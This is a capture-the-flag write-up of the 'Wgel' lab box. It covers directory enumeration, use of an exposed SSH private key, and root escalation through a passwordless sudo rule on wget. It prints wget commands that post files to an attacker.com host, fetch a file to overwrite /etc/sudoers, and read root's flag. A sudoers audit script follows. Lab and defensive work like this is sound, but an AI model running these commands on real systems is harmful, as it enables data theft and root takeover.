Wgel CTF
On first visiting the site, we get the default Ubuntu Apache2 page.
Comment in the page source:
<!-- Jessie don't forget to udate the webiste -->
Directory scan:
[12:06:23] Starting:
[12:06:27] 403 - 278B - /.ht_wsr.txt
[12:06:27] 403 - 278B - /.htaccess.bak1
[12:06:27] 403 - 278B - /.htaccess.orig
[12:06:27] 403 - 278B - /.htaccess.save
[12:06:27] 403 - 278B - /.htaccess.sample
[12:06:27] 403 - 278B - /.htaccess_extra
[12:06:27] 403 - 278B - /.htaccessBAK
[12:06:27] 403 - 278B - /.htaccess_orig
[12:06:27] 403 - 278B - /.htaccessOLD
[12:06:27] 403 - 278B - /.htaccess_sc
[12:06:27] 403 - 278B - /.htaccessOLD2
[12:06:27] 403 - 278B - /.htm
[12:06:27] 403 - 278B - /.html
[12:06:27] 403 - 278B - /.htpasswd_test
[12:06:27] 403 - 278B - /.htpasswds
[12:06:27] 403 - 278B - /.httr-oauth
[12:07:27] 403 - 278B - /server-status
[12:07:27] 403 - 278B - /server-status/
[12:07:30] 301 - 316B - /sitemap -> http://10.201.121.59/sitemap/
Found a useful wordlist:
Scan again with it:
~$ gobuster dir -u http://10.201.13.133/sitemap/ -w ~/SecLists/Discovery/Web-Content/big.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.201.13.133/sitemap/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /home/Birkenwald/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/.ssh (Status: 301) [Size: 321] [--> http://10.201.13.133/sitemap/.ssh/]
/css (Status: 301) [Size: 320] [--> http://10.201.13.133/sitemap/css/]
/fonts (Status: 301) [Size: 322] [--> http://10.201.13.133/sitemap/fonts/]
/images (Status: 301) [Size: 323] [--> http://10.201.13.133/sitemap/images/]
/js (Status: 301) [Size: 319] [--> http://10.201.13.133/sitemap/js/]
Progress: 20481 / 20482 (100.00%)
===============================================================
Finished
===============================================================
We can see that .ssh is exposed; browsing into it yields an RSA private key.
Now recall the name mentioned in the earlier source comment and guess that it is the username:
chmod 400 id_rsa.txt
sudo ssh -i id_rsa.txt jessie@10.201.13.133
After connecting, search for flags that the current user can access:
>find / -name *flag*
/home/jessie/Documents/user_flag.txt
Then run sudo -l to see whether there are any commands that can be executed as root without a password:
Note
The entries shown by sudo -l come from /etc/sudoers.
We find that wget can be abused.
There are two approaches here:
- Overwrite /etc/sudoers, widening the set of commands that can run as root without a password.
- Guess that the flag in root's home directory is named root_flag.txt and read it directly. For the concrete technique, see:
https://gtfobins.github.io/gtfobins/wget/
Approach 1:
First exfiltrate the file whose contents are to be rewritten:
URL=http://attacker.com/
LFILE=file_to_send
wget --post-file=$LFILE $URL
Then write the modified file back:
URL=http://attacker.com/file_to_get
LFILE=file_to_save
wget $URL -O $LFILE
Approach 2:
LFILE=file_to_read
wget -i $LFILE
This successfully obtains root_flag.
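From the defender's side, the root of this box is a NOPASSWD sudo rule that hands an unprivileged user a binary (wget) able to read and write arbitrary files as root. The audit script below is an added example, not part of the original writeup or of the box; it parses a constructed sudoers file and flags such rules. The sample sudoers text, the RISKY_BINS list and the function names are assumptions.

```python
import os
import re

# Constructed sample sudoers file (assumption; the writeup does not show the box's real file).
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
jessie  ALL=(ALL) NOPASSWD: /usr/bin/wget   # the kind of rule this box is built on
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app, /usr/bin/wget
ops     ALL=(ALL) /usr/bin/less             # still needs a password
"""

# Binaries that read or write arbitrary files when run as root (assumed list).
RISKY_BINS = {"wget", "curl", "less", "vim", "find", "tar", "python3"}
TAGS = {"NOPASSWD", "PASSWD", "SETENV", "NOSETENV", "NOEXEC", "EXEC", "LOG_INPUT", "LOG_OUTPUT"}  # sudoers tags (subset)
# user host=(runas) commands ; the (runas) part is optional and defaults to root.
USERSPEC_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$")

def parse_userspecs(text):
    """Yield (user, runas, tags, command) for every command in each user-spec line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")):
            continue
        m = USERSPEC_RE.match(line)
        if not m:
            continue
        tags = set()
        for segment in m.group("rest").split(","):
            segment = segment.strip()
            # A "TAG:" prefix applies to this command and to every later one in the same spec.
            while (parts := segment.partition(":"))[1] and parts[0].strip().upper() in TAGS:
                tag = parts[0].strip().upper()
                if tag in ("NOPASSWD", "PASSWD"):
                    tags -= {"NOPASSWD", "PASSWD"}  # PASSWD cancels NOPASSWD and vice versa
                tags.add(tag)
                segment = parts[2].strip()
            if segment:
                yield m.group("user"), m.group("runas") or "root", frozenset(tags), segment

def risky_nopasswd_rules(text, risky_bins=RISKY_BINS):
    """Return sorted (user, command) pairs that run ALL or a risky binary as root without a password."""
    hits = set()
    for user, runas, tags, cmd in parse_userspecs(text):
        runs_as_root = runas.split(":")[0].strip() in ("ALL", "root")
        binary = os.path.basename(cmd.split()[0])
        if "NOPASSWD" in tags and runs_as_root and (cmd == "ALL" or binary in risky_bins):
            hits.add((user, cmd))
    return sorted(hits)
```

On the sample file the jessie and deploy rules are reported, while ops (password required) and the ALL rules without NOPASSWD are not.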